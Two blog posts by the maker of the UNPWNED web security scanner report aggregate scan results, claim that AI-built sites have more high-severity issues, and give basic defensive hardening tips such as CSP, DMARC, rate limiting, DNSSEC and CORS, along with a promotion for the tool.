I Scanned 447 Websites. AI-Built Sites Have 3x More High-Severity Vulnerabilities.

Raz Azulay — Mon, 06 Apr 2026 13:02:17 +0000

I'm Raz. I've been building a security scanner called UNPWNED for the past few months. It runs thousands of checks across dozens of scanners on any website - headers, DNS, SSL, exposed files, secrets, you name it.

After 447 scans and 3,993 findings, I have enough data to share. Some of this stuff genuinely surprised me.

The big picture

447 sites scanned, 3,993 vulnerabilities found
Average site has 8.9 security issues
Average score: 73.1 out of 100
Only 16.3% scored A or A+
37% scored C (the most common grade)
53% scored C or worse

Most websites aren't terrible. They're just... mediocre. A bunch of missing headers and DNS records that nobody thought to configure.

AI-built vs human-built - this is the big one

I started tagging sites that showed signals of being AI-generated (Lovable, Bolt, Cursor, v0 patterns). The gap is real:

Metric	AI-Built	Human-Built
Avg Score	63.7	75.7
Avg Findings	12.2	9.7
HIGH Severity	2.1 per site	0.7 per site

AI-built sites have 3x more high-severity vulnerabilities.

Why? Because AI tools are really good at building features that work. They'll set up your auth, your API routes, your database queries. But they almost never add:

Security headers (CSP, HSTS)
DNS hardening (DMARC, DNSSEC)
Rate limiting
CORS restrictions

Nobody prompts "oh and add DMARC and CSP headers please." And the AI doesn't volunteer it.

The 5 things almost nobody has

This is across ALL 447 sites, not just AI-built:

Missing Defense	% Without It
Rate Limiting	74%
Content Security Policy	72%
DNSSEC	72%
DMARC	47%
Privacy Policy	68%

74% have no rate limiting. That means bots can brute-force your login endpoint all day and your server won't even notice.

72% have no CSP. One XSS vulnerability and any script runs freely on your pages.

47% have no DMARC. Anyone can send emails pretending to be you@yourdomain.com. Your users will get phishing emails that look like they came from you.

How different platforms score

Platform	Avg Score	Avg Findings
Vercel	75.9	7.0
WordPress	76.5	9.4
Next.js	75.1	7.1
Cloudflare	72.2	7.6
Netlify	64.2	13.4

Vercel and Next.js do better than average but still miss critical stuff. Netlify sites scored the lowest among modern platforms - not sure why, might be the default headers config.

Grade distribution

Grade	% of Sites
A+	8.9%
A	7.4%
B	30.6%
C	37.1%
D	13.6%
F	2.2%

The most common grade is C. Not failing, but not anywhere close to secure.

What you can fix in 30 minutes

The gap between a C and a B (or even an A) is usually not a rewrite. It's a few configs:

1. Add CSP headers
Even a basic Content Security Policy blocks most XSS vectors. If you're on Next.js, it's a few lines in your middleware.

2. Set up DMARC
Add a DNS TXT record for _dmarc.yourdomain.com. It tells email servers to reject spoofed emails from your domain. Takes 5 minutes.

3. Add rate limiting on auth routes
Even a simple IP-based limit (like 10 attempts per minute) stops brute force attacks. Most frameworks have middleware for this.

4. Enable DNSSEC
This is usually a one-click toggle at your DNS provider (Cloudflare, Namecheap, etc).

5. Check your CORS policy
If you're using Access-Control-Allow-Origin: * in production, you're letting any website make requests to your API.

Check your own site

I built UNPWNED because I was shipping fast with AI tools and had no idea what was exposed. The scanner checks thousands of things across dozens of scanners, only looks at publicly visible information (same stuff anyone visiting your site can see), and it's free to try.

unpwned.io

No account needed for a quick scan. Happy to answer questions about the methodology or findings in the comments.

We Scanned 400+ Websites. Here's What We Found.

Raz Azulay — Wed, 01 Apr 2026 10:56:56 +0000

We built UNPWNED, a security scanner for web apps. Over the past few weeks, we scanned 400+ websites across startups, SaaS products, and side projects.

Here's what the data told us.

The Numbers

412 scans across 167 unique domains
Average first-scan score: 65 out of 100
Only 2% scored an A on their first scan
58% scored a C, 23% scored D or F

The Most Common Issues

Issue	% of Sites Affected
DNSSEC not enabled	75%
No rate limiting on API endpoints	70%
Missing Content Security Policy	69%
Weak CSP configuration	57%
No cookie consent mechanism	48%
Missing DMARC record (email spoofing risk)	47%
No privacy policy page detected	40%
Missing DKIM record	37%
Missing HSTS header	34%
Permissive CORS policy	29%

What Surprised Us

Almost half of all sites can be email-spoofed. 47% were missing DMARC records, which means anyone can send emails pretending to be from their domain. Your users could get a phishing email "from" you today.

70% had no API rate limiting. That means a single script could hammer their endpoints with zero resistance. No throttling, no blocking, nothing.

69% had no Content Security Policy. CSP is one line of configuration that prevents XSS attacks. Most developers skip it because they don't know about it.

The Good News

Sites that used our fix suggestions and rescanned improved by an average of +8 points. Some jumped from D to A in a single afternoon.

The gap between "vulnerable" and "secure" is usually not a rewrite. It's a few headers, a DNS record, and some basic configuration.

What You Can Do Right Now

Add a CSP header - even a basic one blocks most XSS vectors
Set up DMARC, SPF, and DKIM - protect your users from email spoofing
Add rate limiting - even a simple middleware prevents abuse
Enable HSTS - one header that forces HTTPS everywhere
Check your CORS policy - don't use * in production

Try It Yourself

We built a free instant security checker - no signup required:

Check your website security score

It runs 30+ checks and gives you a score, grade, and list of findings. If you want detailed fix instructions, you can sign up for free (5 scans/month).

Built solo by an indie hacker. UNPWNED was featured by top dev communities and presented to engineering teams at leading tech companies. If you have questions about any of these findings, drop a comment - happy to help.

Forem: Raz Azulay